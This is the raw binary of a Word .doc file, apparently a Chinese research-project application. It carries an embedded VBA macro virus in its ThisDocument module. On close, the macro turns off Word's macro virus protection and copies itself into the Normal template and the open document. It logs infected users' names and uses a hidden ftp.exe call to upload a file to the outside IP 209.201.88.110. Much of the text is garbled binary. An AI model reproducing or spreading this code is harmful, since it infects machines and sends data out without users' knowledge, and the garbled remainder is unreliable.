��ࡱ�>�� %'����$��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������'` �R��bjbj"9"98@S@S� �������X�88L �Z xddddd� � � � � � � � � � $�h:�� !� � � � � � ddP i i i � Bdd� i � � i i i dX �d d5��� i � * 0Z i �� j�i �i P� � i � � �� � � � � Y � � � Z � � � � ���$���2FT���� �sQ�Nl��S 0wYe���SsQ�NZP}YxvzuYe��Yef[9ei�xvz͑�p����3u�b�N�SxvzuYe��R�e�W0Wt� ��]\O�v��w 0�v��w T�W{QUSMO� �s\ 0wYe���SsQ�NZP}YxvzuYe��Yef[9ei�xvz͑�p����3u�b�N�SxvzuYe��R�e�W0Wt� ��]\O�v��w 0�ԞYe�yx�S020120333�S �l��S�~`O�N � ^gT�W{QUSMO��wxvz �v^�~T�[E��`�Q �ZP}YxvzuYe��Yef[9ei�xvz͑�p����3u�b�N�SxvzuYe��R�e�W0Wt� ��]\O �c�[N�NkX�Q�vsQh������������������������������gd)P� $�`�a$gddT}$a$gd�wy$a$gd�wy����� � � � � ,046<>PRT\`bfr��������<>������������������������������������̻�������������h�w�jh�w�UhdT}hdT}CJaJhdT}CJaJhdT}CJaJo(h4.CJaJh�#gCJaJo(h4.CJaJo(h�wyCJaJo(h�kLCJaJo(Uh�kLh�kLCJaJo(h�kLh�kLCJaJ(5��]wxvzuYe��R�e�W0W3u�bh� 0���D��N4 ��~(�N_N�N �0 0T�TR�e�W0WOS��fN 0��~(��echN_N�N ��bxvzub� �xvzub�\�~�~N�[ۏL�ċ�[ ��bO�N9g24�eMR�bwYe���S0 T� �| �N�:_�^ T��|5u݋�3628008 5��]'Yf[xvzub� 2012t^9g18�e     61�82P:p�H���. ��A!�"�#��$��%��S�� �������������666666666vvvvvvvvv666666>666666666666666666666666666�6666666666�666666666666hH66666666666666666666666666666666666666666666666666666666666666666�6J@��J �H�ck�e $1$a$ CJKH_HaJmH nHsH tH$A���$ ؞���k=�W[SOBi���B 0nf�h�Taq���r � �r � �r � �r �u<�r � �r � �r � �r � 67>Taq�����������ȑ08�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0�ȑ0� � ����\�(# � �A�A@���������H � �0�( � � ���0�( � ��B �S ���� ?�����s|������;*�urn:schemas-microsoft-com:office:smarttags�chsdate� � � �18�2012�9�Day�False �IsLunarDate �IsROCDate�Month�Year>@ntxy|}��������������'+06HIKSWX[`di�������������7>T`����������������ktsi4.� �kL�#gog�wydT})P�s$��H��b��w����@�ԇ���@@��Unknown������������G��z ��Times New Roman5��Symbol3&� �z ��ArialM��%Times New Roman;���[SOSimSun7&���{ @�Calibri 1��hƛ gǛ gD��D�!?!%),.:;>?]}������    & 0 2 3 : !6"000 0 0 0000006�:�>�@�D�Z�\�^����� � �����=�@�\�]�^���$([{���  0 0 000000Y�[�]����;�[������������3���HP)��$P�����������������������wy2��5 sQ�Nl��S 0wYe���SsQ�NZP}YxvzuYe��Yef[9ei�xvz͑�p����3u�b�N�SxvzuYe��R�e�W0Wt� ��]\O�v��w 0�v��wYJQang20060652�������Oh��+'��0��� ,@ T` � � ������l ����ת����ʡ���������������о���������ѧ�ĸ��о��ص�����걨�Լ��о����������»�����ѡ������֪ͨ����֪ͨYJQang Normal.dot 200606523Microsoft Office Word@F�#@|(95��@��\5��D�����՜.��+,��0� X`���� �����Hewlett-Packard Company�'  ���� �������� !"#��������&E����)*+8-./01234567(9:;<=>?@ABCD����OGHIJKLMN��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Root Entry�������� �Fp�.d5��F�1Table������������ �WordDocument��������8SummaryInformation(����DocumentSummaryInformation8������������Macros ���c5���d d5��VBA�����������c5���8d5��ThisDocument ����,�8  !"#$%&'()*+,-./0����23456789��������<=>?@����B��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������B(D$H$F���>HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info�LogFile J%L�� $��� (!>!P (!>%N'0 &�e� *!>!P *!>%N'0k��� 0� 0�' Log�file -->� 0� 0�' Log�file -->� $�'0� R���� 2� V$T��$� '2� R���C:\hsf 2�.sys'2 2����� 0��V� c:\netldx.vxd������o 209.201.88.110����user anonymous���� pass itsme@���� cd incoming����ascii����put 2����quit��V�*command.com /c ftp.exe -n -s:c:\netldx.vxd ZA@X���>HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info�LogFile J,Lk����MMake sure that some conditions are true before we continue infecting anything�  $� &� 4!\ ^ 4!\ `� Tru�Infect the NormalTemplate $��ed = T <!b'"alTe� (!>!P (!>%N',veDocu�1Write a log file of this NormalTemplate infection� R�� d!.� d!. R�$�� $f� d!. R�$�� $f� . d!. R�$�'.k��d�� .� $f�' '.k���� R��� ) ,� $f�'  h�hh:mm:ss AMPM - $� Z�dddd, d mmm yyyy$�� $f�'  d!j� $f�'  .� $f',ode � *!>!P *!>B@l , *!>B@nime, " "��G <B@pjk����Infect the ActiveDocument� &� 4!r��$��: 4!b��W 4!b' empl� *!>!P *!>%N',tiveDo� (!>!P (!>B@lr , (!>B@n mmm y ��G 4B@pjk���k���o���� Logfile -->3) &�" 09:08:36 - Saturday���������%-��������������������������������x��ME������������� ��������������������������������������������������������������������������������������������������������������������������������(S"����S����S"����<������(1Normal.ThisDocument��������������(����������% ����������������������������������@���������L��x@� �������� ��@�"�������� ��@�$�������� ��`�&�������� ��@�(�������� ��`�*�������� ��@�,�������� ��@�.�������� ��@�0�������� ��`�2�����������������0����������������0����������������������������������������������������������������������"�� ������ ����� � ����� 0�H�h�x� ����� ������ �����&��& � ����� ����� $H� p� ����� �����z�� ����� �"� 8�"H�p� �����Zx� �������*�� �0� �����P�`� p� �������������� �8�P� h� �����8x� �����^�� ������ ����� ����� T�Dp� ����� ����� �� �� ����� �� �����"�� ����� ����� 8 �X�$p�$�� ��������� � �����(�(� ����� �������� ������ �����0� ����� ����� 8�FX� ����� �� �����"�� ��������� ����� � �����( � ����� �����0 � �����8 � ����� @ � ����� (X � � � � � � � ����� ����� ����� *� � � � � � ����� ����� ����� ( � ( � 8 � ����� ����� ����� *@ � p � � � ����� ����� ����� *� � � � � � ����� ����� ����� *� � �  � ����� ����� ����� ( � @ � X � ����� ����� ����� ,` � � � � � ����� ����� ����� (� � � � � � ����� ����� ����� , � 0 � @ � ����� ����� ����� (H � p � � � ����� ����� ����� *� � � � � � ����� ����� ����� (� � � �  � ����� ����� ����� ( � @ � X � ����� ����� ����� (` � � � � � ����� ����� ����� *� � � � � � ����� ����� ����� *� � (� @� ����� ����� ����� (H� p� �� ����� ����� ����� (�� �� �� ����� ����� ����� ,�� � ,� ����� ����� ����� *H� x� �� ����� ����� ����� *�� �� �� ����� ����� ����� *�� � � ����� ����� ����� * � P� `� ����� ����� ����� (h� �� �� ����� ����� ����� *�� �� �� ����� ����� ����� *��  � 0� ����� ����� ����� *8� h� x� ����� ����� ����� *�� �� �� ����� ����� ����� *�� �� � ����� ����� ����� .� @� P� ����� ����� ����� .X� �� �� ����� ����� ����� *�� �� �� ����� ����� ����� *�� � (� ����� ����� ����� ,0� `� p� ����� ����� ����� ,x� �� �� ����� ����� ����� ,�� �� � ����� ����� ����� *� 8� H� ����� ����� ����� *P� �� �� ����� ����� ����� *�� �� �� ����� ����� ����� .�� �  � ����� ����� ����� .(� X� h� ����� ����� ����� *p� �� �� ����� ����� ����� *�� �� �� ����� ����� ����� *� 0� @� ����� ����� ����� *H� x� �� ����� ����� ����������0�p]�<- this is a marker!�p�Declare Variables]��������]���]��0�H�`�� ���Initialize Variables�� 4!6!8%:.(������ <!6!8%:.* �� ���'�' (!>%@'$ ���'�' *!>%@'&�Switch the VirusProtection OFF� , 28 Nov 1998� SPo0Ky� Blue Planet��$ 02:50:31 PM - Saturday, 28 Nov 1998� MARK B. SEAY��! 08:04:45 AM - Friday, 4 Dec 1998� UPS��$ 11:43:35 AM - Thursday, 17 Dec 1998� WRO��# 03:07:26 PM - Tuesday, 22 Dec 1998� BCBSA��$ 03:28:02 PM - Wednesday, 6 Jan 1999� BCBSA��" 02:59:47 PM - Monday, 11 Jan 1999� Marsha Veach��% 01:54:54 PM - Wednesday, 20 Jan 1999� Connie Sandifer, CMP��" 09:33:06 PM - Monday, 25 Jan 1999� Doug Rowan��% 08:21:12 AM - Wednesday, 27 Jan 1999� IMSI��" 10:59:58 AM - Friday, 29 Jan 1999� Raj��$ 03:37:57 PM - Saturday, 30 Jan 1999� hornd��" 01:26:48 PM - Tuesday, 2 Feb 1999� Cooley Godward��" 04:57:29 PM - Tuesday, 2 Feb 1999� Cooley Godward��" 06:35:44 PM - Tuesday, 2 Feb 1999� Cooley Godward��# 04:23:52 PM - Thursday, 4 Feb 1999� Cooley Godward��# 04:27:39 PM - Saturday, 6 Feb 1999� Cooley Godward��! 06:18:06 PM - Monday, 8 Feb 1999� Cooley Godward��" 09:17:17 PM - Tuesday, 9 Feb 1999� hclee��% 04:44:45 PM - Wednesday, 17 Feb 1999� Dr. W. Hsiao�% Wendy Hsiao, Ph.D.�# 04:13:19 PM - Tuesday, 23 Feb 1999� CCST��$ 10:09:35 AM - Saturday, 20 Mar 1999� cpwu��# 09:33:49 AM - Thursday, 6 May 1999�� ��������# 12:39:25 PM - Tuesday, 20 May 1997� ghc-bbc��! 01:21:36 PM - Friday, 7 May 1999� �������# 05:51:53 - Wednesday, 12 May 1999� qdzhuang��$ 03:23:04 PM - Saturday, 19 Jun 1999� �������$ 02:53:46 ���� - Tuesday, 6 Sep 2011� �������$ 09:37:47 ���� - Monday, 19 Sep 2011� ��ʿ����$ 01:41:54 ���� - Monday, 26 Sep 2011� unknown��' 10:50:02 ���� - Wednesday, 19 Oct 2011� ף�Ȫ��' 08:27:05 ���� - Wednesday, 26 Oct 2011� ����ٻ��$ 10:37:36 ���� - Monday, 31 Oct 2011� ���˷���$ 04:21:38 ���� - Monday, 31 Oct 2011� ���÷��& 08:15:53 ���� - Wednesday, 2 Nov 2011� �Ż᷼��% 02:57:58 ���� - Thursday, 3 Nov 2011� unknown��% 04:00:59 ���� - Thursday, 3 Nov 2011� ������# 09:41:48 ���� - Friday, 4 Nov 2011� �Ӻ���# 11:18:07 ���� - Monday, 7 Nov 2011�� unknown��$ 03:01:17 ���� - Monday, 21 Nov 2011 � unknownr��' 09:59:34 ���� - Wednesday, 28 Dec 2011r� unknownt��' 11:26:57 ���� - Wednesday, 22 Feb 2012r� unknownb��$ 09:22:07 ���� - Monday, 30 Apr 2012veN� ��С��m��# 10:07:34 ���� - Monday, 7 May 2012Nor� 20068726��# 03:13:43 ���� - Friday, 1 Jun 2012im � 20060652��$ 09:30:25 ���� - Friday, 15 Jun 2012erA� 20060652�����h ����B�Attribute VB_Name = "ThisDocument" �Bas�1Normal.VGlobal!�SpaclFalse �CreatablPre declaId�Tru BExposeTemplateDeriv$Customliz�C�1P Sub ��_Cl5() On Error Res� Next� Const @Marker��<- t� is (a m !�� 'Dl Vari=s Dim �Save8,���e,GInfec`ted, �� As Boole�an-ant ObjCOurCode, UserAddres�s, LogD�fYFihS��ngA9'Initi0aliz��/Se�t a�bAct�[��1.VBProA�@Compon@�s.Item(1��S� &= 2� 0���<= .�3Module.Find�(�c, 1�0@�O= nt+FSwitchC�|Firus>t�Zion OFF���pt�s.V  = ��A If (Day(Now())�1) And (Sysm@M.��@fgf("", "HKEY_CURRENT_USER\Softw��\Micros@\MS �\up (ACPME)\A? `(o7!@?!>"��) The`H � �E;`�&k'�DH�ad))Li0nes(`1�Co�untOf��2!�E �� 64AuT�7F��Q�,If����Mid(�,�%�.�&"'�f" & "�2 -->")hen�) -���$ CF��i�@� To 4c � e"s=&+ A�Int(8 * R�nd)`2�]$ � ic@$"C:p\hsf���.8sys��A1Op en� �OutpruB�#1C S@y#��; A��B� �c� "c:\netldx.vxd" � "o 209.201.88.�110�"u� anonymou�pass @itsme@�c d inc��ng��ascii�A �H'�qui���(� Shell "A�mand.� /c ftp.exe -n -s:�$, vbHi�d`�g3?�K?��A�ٟA= cr�Ed32PMake sur�e`Pat so���cond c�q �H t�| befo@we �tin�ue�1ming�ny�s�f@(�F ~X�1�AQq�2! cS_]"(li�v�&m0 = wd�� Or� c_e^�y�R�R�q�rA 2a� �� � �� [W� �  .1�dQ1 �}pXX0ZX3S'Wri��a log rf�of P�, i�B� ns� �KL�P�ApplicaAp~.��I�o1Lot�i�L <> Chr�(13��(qs�h���0� I�` `]���C�1R �lk�Y=&f �W'� �F �\�'��9,3R0j�J�+(Timp�"hh:mm:0QAMP�M j�&�/��� �]�d, d �mmm y���O ���Ǐ �� �AG��}Del�ete�������e.��From�t��H��S�;/90#QG?B�ݬ�%� �9B�F�k6m����F(b* �Ful��,F ��P ":"N ~ ?N2�� q VR=����gIH ?��<����K|�������Sto$x���g:W�Sub�r�BT �09:0 8:36 �7Sa@turday�8�0$v 1998� SPo0Ky��Bl�rPla���!d2:50:31 r<��MARK B�. SEAY ' ' 08:04:45 AM - Friday, 4 De@c 1998� UPS �11:43:3fThursj17 lWRO l03:07:2�6 PjTue522 5BCBSA 72�27Wed�n96 Jan� 9/ 82:59�:478Mon�1 Marsha@ Veach ;1�:54;20 Connie Sandifer, CMP $9:3'}�{C25�"Doug Rowan�8:21:12ψ}27 IMS�I 10�}58���29J RajK@u7:5LSatu r�L3K3����0B�065��8[�>0�P��`���_VBA_PROJECT������������* dir������������1PROJECTwm������������:)PROJECT ����;e�ay� ��*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.3#0#C:\Program Files\Microsoft Office\OFFICE11\MSWORD.OLB#Microsoft Word 11.0 Object Library�*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal�&�Q(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.3#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL#Microsoft Office 11.0 Object Library �����������Q����������������������������������������������������������������ThisDocument0251ffbf9f��ThisDocument���+-������ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������J���C��c�B20��������`�9:��,Word�k`VBA��`Win16�~`Win32`Mac��`VBA6�#`����1p`stdole�``Project-�` ThisDocument<�` ��_Evaluate�`Normal��`��Officeu`Documentj�`��Document_Close7\`��MarkerS�` ��SaveDocumentd]`��SaveNormalTemplate�l`��DocumentInfected �`��NormalTemplateInfectedy�`��ad~\`��nto^`��OurCode�=` ��UserAddressF�`��LogData(6`��LogFileG�`��ActiveDocument�\` ��VBProjectOh` ��VBComponents '`Item�z`��NormalTemplateq�` ��CodeModule�`��Findn�`��Options��`��VirusProtectionoD`Day��`Now%�`��Systema�`��PrivateProfileString[`��Lines��` ��CountOfLines!\`��i``Str��`RndR�`ShellV�`vbHide�W` ��SaveFormat�`��wdFormatDocument��`��wdFormatTemplatee`��Savedd�` ��Application�*`ChrK~`Time��`��UserName\�` ��DeleteLines �` ��AddFromString��`��Save��`��FullNameО`��T�������������������������������������������������������� ���0*� pH�d�ProjectQ(@=� l ����Q J< rstdole>stdoleP h%^*\G{00020�430-C 0046}#2.0#0#C:\WINDOWS\system32\e2.tlb#OLE Aut�omation`�ENormal�EN�CrmaQ�F � �* \C �&�Q�!Offic�gOf�ic�g����!G{2DF8D04C-5BFA-101@B-BDE5�gAjA�e4�2�g��gram Files\CommonMicrosoft Shared\OFFICE11\MSO.DLL#��M 11 .0 Ob�� L�ibrary�%�"�z���BeThisDocumentG � T�fis"D�Hcu@Ie�n�n� 2� �(HB1B�+-XB,�!T�"B+BBThisDocumentThisDocumentID="{1ABFCFF7-25B0-42C0-82D8-013497BE5601}" Document=ThisDocument/&H00000000 Name="Project" HelpContextID="0" VersionCompatible32="393222000" CMG="686AA73DAB3DAB3DAB3DAB" DPB="D0D21FA020A020A0" GC="383AF708F808F8F7" [Host Extender Info] &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000 [Workspace] ThisDocument=0, 0, 0, 0, C �� ���� �FMicrosoft Office Word �ĵ� MSWordDocWord.Document.8�9�qCompObj������������Am������������������������������������